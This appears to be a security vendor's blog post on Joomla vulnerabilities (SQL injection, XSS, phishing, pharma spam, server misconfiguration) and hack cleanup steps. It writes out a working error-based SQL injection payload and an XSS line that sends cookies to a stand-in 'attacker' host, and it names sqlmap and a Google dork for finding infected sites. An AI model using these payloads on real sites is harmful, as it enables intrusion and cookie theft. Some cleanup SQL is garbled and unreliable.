Joomla hack featured image

Joomla Hacked? These Joomla Vulnerabilities Could be the Reason

Joomla is a CMS in the long list of free software. This free CMS has been helping to build and maintain robust websites. There has been a long-standing debate about which CMS is the best, WordPress or Joomla. However, Joomla outperforms the rival in flexibility and security. Moreover, it powers some of your favorites like the Pizza Hut, Harvard University etc. However, as it is open source, its source code is publicly available. More developers looking through its code means discovering more vulnerabilities in the Joomla CMS. So, leading to its popularity Joomla hack is relatively common these days. Even this year multiple Joomla security issues have been discovered. These include vulnerabilities like Joomla XSS, File intrusion, Joomla SQL injection etc. So, Joomla security issues have been keeping the security team busy throughout the year. It makes website cleanup a tedious task as more and more bugs are discovered. According to the official Joomla website,

A CMS-powered website has all the ingredients for an IT security nightmare: it is publicly accessible, it’s running on powerful machines with great connectivity and the underlying system is used countless times around the globe, making it an attractive target for attackers.

Signs of a Joomla Hack

  • A google search shows ‘This site may be hacked‘ in the meta description.
  • Cryptocurrency mining in the background.
  • DNS redirection for your website.
  • Index page defaced or replaced by a Joomla hack.
  • Logging you out of admin account.
  • New admins appear.
  • Page loading gets slow or bulky.
  • Previously non-existant spam starts to appear on your site.
  • The site gets blacklisted by Google for ‘malware‘ or ‘phishing‘.
  • This spam also includes ads and unwanted redirects.
  • Unnatural traffic hike on your site. You can check all this using the Google webmaster tools.
  • CMS or other software may be broken. Especially firewall!

Your website shows signs of a Joomla hack? Drop us a message on the chat widget and we’d be happy to help you. Fix my website results now.

Joomla Security Issues

1) Joomla Vulnerability: Joomla SQL Injection

SQL injection is one of the significant Joomla security issues. Joomla has a long history of SQL vulnerabilities. An SQL injection is the result of unsanitized input. You trust the user with input and all kinds of things can go wrong. Joomla SQL injection dates back to as far as 2008. Back then it was due to Ice Gallery (com_ice) component 0.5 beta 2 for Joomla. This year too, multiple Joomla SQL injection points have been found. The latest Joomla SQL injections this year includes CVE-2018-8045. Multiple vulnerable components were discovered this year. However, to simplify things we will focus on the latest one. The ‘jimtawl‘ component of Joomla is vulnerable to SQL injection. The vulnerability resides in the parameter ‘id‘. A simple post statement would look like this:

http://localhost/[PATH]/index.php?option=com_jimtawl&view=user&task=user.edit&id=[SQL]

However, the problem is if a user provides unsanitized input after the parameter ‘id‘. Things can be escalated from here on. It can be exploited using an ‘error based and‘ statement.

' AND EXTRACTVALUE(66,CONCAT(0x5c,(SELECT (ELT(66=66,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))-- VerAyari

So, this code given above can be used to exploit it. This code prints the user info and database version of the server. The code can be tweaked to execute all kinds of database operations. Recently, details regarding this have been released on exploit-db. This means it is publically visible to all. So even a noob can cause a Joomla hack. Especially using tools like sqlmap. Sqlmap would automate the whole process. So this component is one of the Joomla security issues on your site. Avoid till its patched!

2) Joomla Vulnerability: Joomla XSS

Cross Site Scripting attacks are frequent on Joomla websites. Multiple XSS Joomla security issues have been found this year. A Joomla XSS is quite similar to a Joomla SQL injection. However, the difference here is that it is exploited using Javascript. Joomla is aware of the fact and therefore has some checks and balances. These XSS filters remove out the harmful input. However, the CVE-2018-11326 was all about bypassing these filters. It was severe because it was persistent XSS. The latest one in this long list is CVE-2018-12711. The ‘language switcher module‘ is responsible this time. The URL of some languages can be injected with javascript.

<script>window.location='http://attacker/cookie='+document.cookie</script>

For instance, this piece of code steals the user cookie. So, this one is a reflected XSS. That means the attacker can create a special request. Sending this request can be used for phishing or cookie stealing. Further tools like Xsser can help to automatically detect and exploit websites.

3) Joomla Vulnerability: Javascript Injection

When it comes to Joomla, Javascript helps to perform powerful and dynamic tasks. Sometimes due to faulty coding, there is a scope for a Javascript injection in Joomla. A Javascript injection basically helps to manipulate the website. Moreover, an attacker can use it to steal cookies and change the way your site looks. A simple manual testing for Javascript injection can be done. In the address bar of your site type:

javascript:alert(‘Executed!’);

If you see a message box saying ‘Executed‘ then your site is vulnerable. A Javascript injection can have deadly consequences for your website. It can:

  • Insert fake forms on the site.
  • Steal user cookies.
  • Change the complete appearance of the site.
  • Used for injecting spam.
  • Used for fake redirects.

A Javascript injection is just lack of input validation. When it comes to Joomla, don’t rely on client side execution of the code. However, other parameters like input fields could be vulnerable to Javascript injection too. So the best practice would be to use automatic modules for testing.

4) Joomla Vulnerability: Phishing

Phishing attacks are often deployed to commit a Joomla hack. A phishing attack makes a legitimate user believe in fake pages. The unwary user then submits sensitive info to the page. This info is then read by the attacker to gain access to the system. Multiple methods are used for phishing like:

  • Fake login pages.
  • Phishing Emails.
  • Phishing phone calls.
  • Fake update pages etc.
  • Using Joomla security issues like XSS for phishing.

A new type of phishing attack is on the rise nowadays. Firstly it shows a login page in the minimized container.

Joomla hack phishing exaple

This looks like any other legitimate page. However, the trick lies in minimizing the page. The user can see only the first few words of the URL. So he/she may assume the page to be legitimate.

Joomla hack phishing page

However when the full URL is exposed the scenario is different. It was a fake page set up by MaliciousSITE.com. It is no big deal for it to gain an HTTPS certificate. Moreover, certain advanced tricks like URL encoding etc come handy for attackers. This makes the page look just like the real page. So always beware of opening any Joomla login links!

5) Joomla Vulnerability: Pharma Hack

Joomla websites are good targets for SEO spammers. Mostly owing to their popularity. Spammers use these websites to spread their ads. Mostly showing pharmaceutical products especially pills. The bulk of SEO spam infected websites can be searched on Google. A simple Google Dork like inurl: "viagra" "powered by Joomla" can do the trick. The search query then shows something like this.

Joomla Pharma Hack

As we can see all these Joomla websites are infected with SEO Spam. Their meta description shows ‘viagra‘ ads. Multiple Joomla vulnerabilities can be used to inject this spam. Probably it could be a code injection or any other Joomla hack. However, the results are devastating for the website. The website loses its reputation and user trust. It can be hard to recover back on the search rankings after a Pharma Hack.

6) Joomla Vulnerability: Misconfigured Server

Sometimes in case of a Joomla hack, the faulty server could be responsible. Often lack of proper permission on the server can wreak havoc. In Joomla installations, by default, the .htacess file has the write permissions. So, This could cause the attacker to gain sensitive info. Multiple things can go wrong with the servers like:

  • Weak credentials.
  • Open ports.
  • Forgotten sub-domains.
  • Outdated installations.
  • Unprotected DNS server.
  • Multiple websites sharing the same space without subnetting. So if one is infected it spreads.

So, the server installation needs to be checked from time to time. Weak file permissions and errors expose sensitive info. Therefore server security is vital to avoid a Joomla hack.

Need professional help in securing server from a Joomla Hack? Drop us a message on the chat widget and we’d be happy to help you. Fix my website results now.

Cleaning a Joomla Hack

1) Fixing Joomla Hack: Database Cleanup

Firstly begin cleaning from that infected database. Joomla SQL injection can create new database users. To look out for new users created after a specific date, use the following code:

Select * from users  as u

AND u.created > UNIX_TIMESTAMP(STR_TO_DATE('My_Date', '%M %d %Y '));

Once rogue users are found. So, Delete them using the SQL statement Drop User;.Not only this, to avoid future infections:

  • Sanitize the user input.
  • Restrict database permissions to the account.
  • Block Database error disclosure to locally only.
  • Use type casting wherever possible.

2) Fixing Joomla Hack: Securing the Server

Even when the installation is secure, fault servers can cause a Joomla hack. Although there is a big list of Joomla security issues. Certain key points to remember are:

  • Close any open ports.
  • Remove the unused subdomains.
  • Check regularly for configuration issues.
  • If you are sharing a server go for subnetting. Or use a VPN.
  • Block the error messages leaking info.
  • Give strong and random passwords to FTP accounts and database!
  • Make sure you use a firewall or some sort of security solution.

3) Fixing Joomla Hack: Setting Permissions

  • Primarily, ensure that no user can upload executables like .php .aspx etc. Only image files are to be uploaded on the server.
  • Now move on to set the file permissions for the server. Perhaps the most sensitive file is the .htaccess file. So, to set proper file permissions. Set your .htaccess permission to 444 (r–r–r–) or maybe 440 (r–r—–).
  • Also, ensure that your PHP files cannot be overwritten. Therefore you need to set *.php  to 444 (r–r–r–).
  • Most importantly use the popular file extensions. Joomla is a pretty big CMS so alternates are always there. Popular extensions get updates faster in case of vulnerability. So try most of the times to go with the popular demand!

4) Fixing Joomla Hack: Check Modified Files

Most of the time the hackers modify your files to inject spam. It can cause a real mess in your
installation. You might need a fresh installation. To avoid all this ensure you always keep a
backup. While analyzing the files after a Joomla Hack, the diff command comes handy. It
helps to check for modified files. All the Joomla files are available publically on Github.
This can be used for comparison. To check core file integrity with SSH commands:

$ mkdir joomla$ cd joomla

Firstly, we created a directory named joomla and switched over to that.

$ wget https://github.com/joomla/joomla-cms/releases/download/3.6.4/

Joomla_3.6.4-Stable-Full_Package.tar.gz

$ tar -zxvf Joomla_3.6.4-Stable-Full_Package.tar.gz

The wget command downloaded Joomla files from GitHub. The second line of code

then extracts them.

$ diff -r joomla-3.6.4 ./public_html

Finally, the diff command here is comparing the contents. This time we are looking

at the public_html file. Similarly, you can check multiple files. Moreover, the files

can be manually checked. Just log in using any FTP client and check files. SSH

enables you to list file modifications.

$ find ./ -type f -mtime -15
Here this SSH command reveals the files modified in last 15 days. Similarly, you

can change the time stamp. Look out for any recently modified files!

Consult Astra security experts now to find and fix a Joomla hack. Our powerful Firewall

safeguards your website from XSS, LFI, RFI, SQL Injection, Bad bots, Automated Vulnerability Scanners, and 80+ security threats. Secure my website now.

Fixing Joomla Hack: Check User Logs

System logs are the best tool to identify the cause of a Joomla hack. System logs record

all the previous activities that took place. So whenever an XSS or SQL injection takes place,

there is always a record of the request. Furthermore, the hackers tend to create new admin

accounts. If you wish to check for any suspicious users, then:

  1. Firstly Log in your Joomla Dashboard.
  2. Now, click on Users and select Manage.
  3. Here check for suspicious users. Especially those recently registered.
  4. Now proceed to Remove any unknown users.
  5. Also, check the Last Visit Date.
  6. Find out where the server logs are stored. Use it to identify Joomla SQL injection etc.
  7. If you see users logging from unknown IPs, remove them.

Moreover, use google diagnostic report to find the cause. It gives you a comprehensive view

of your site. If your site is blacklisted work closer with Google. The diagnostic report will give

you the cause for blacklisting. Use it to find and weed out the infection!

Fixing Joomla Hack: Update

Most of the time a Joomla hack takes place due to unpatched files. Ensure all your modules are updated. Also, make sure the server software is up to date. Always turn on Automatic Updates. It may sound resource consuming but it is a secure practice. Joomla security issues can keep you busy. So, if you find it difficult to clean the Joomla hack, consult experts.

Take an Astra demo now!

Web Application Firewall Magento, Opencart Prestashop

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

A computer nerd. Loves working with Sqlmap and BeEF (the software) ;) Has experience in wireless pen tests. Owns a chatbot on Pandorabots named Mark1. In free time he can be found saving some goals.

2 Comments

  1. Joomla Hacked Sending Spam: Symptoms, Vulnerabilities and Fixes - Reply

    […] However, being popular also makes it a target for spammers and hackers. Often users complain about Joomla hacked sending spam on the community forums. These attacks are fairly common due to the sheer bulk of […]

  2. Joomla Redirect Hack: Symptoms, Causes & Fixes - Reply

    […] this CMS is user-friendly. Joomla is also popular due to the wide variety of extensions it offers. Multiple vulnerabilities have been uncovered in Joomla this year. These ranges from Joomla XSS, File intrusion to Joomla […]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close